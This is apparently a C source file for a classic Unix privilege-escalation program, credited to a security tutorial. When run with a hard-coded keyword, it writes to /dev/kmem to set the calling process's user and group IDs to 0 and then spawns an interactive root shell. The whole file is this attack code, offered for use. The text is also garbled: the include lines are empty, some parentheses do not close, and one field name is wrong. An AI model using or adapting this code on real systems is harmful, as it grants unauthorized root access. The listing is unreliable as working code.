/* If /kmem is is readable and writable, this program will change the user's UID and GID to 0. */ /* This code originally appeared in "UNIX security: A practical tutorial" with some modifications by daemon9@netcom.com */ #include #include #include #include #include #include #include #define KEYWORD "nomenclature1" struct user userpage; long address(), userlocation; int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd<0){ printf("Cannot read or write to /dev/kmem\n"); perror(argv); exit(10); } userlocation=address(); where=(lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(20); } count=read(fd,&userpage,sizeof(struct user)); if(count!=sizeof(struct user)){ printf("Cannot read user page\n"); perror(argv); exit(30); } printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid); userpage.u_ruid=0; userpage.u_rgid=0; where=lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(40); } write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage)); execle("/bin/csh","/bin/csh","-i",(char *)0, envp); } } } /* End main */ #include #include #include #define LNULL ((LDFILE *)0) long address(){ LDFILE *object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit(50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp("_u",ldgetname(object,&symbol))){ fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value); ldclose(object); return(symbol.n_value); } } fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60); }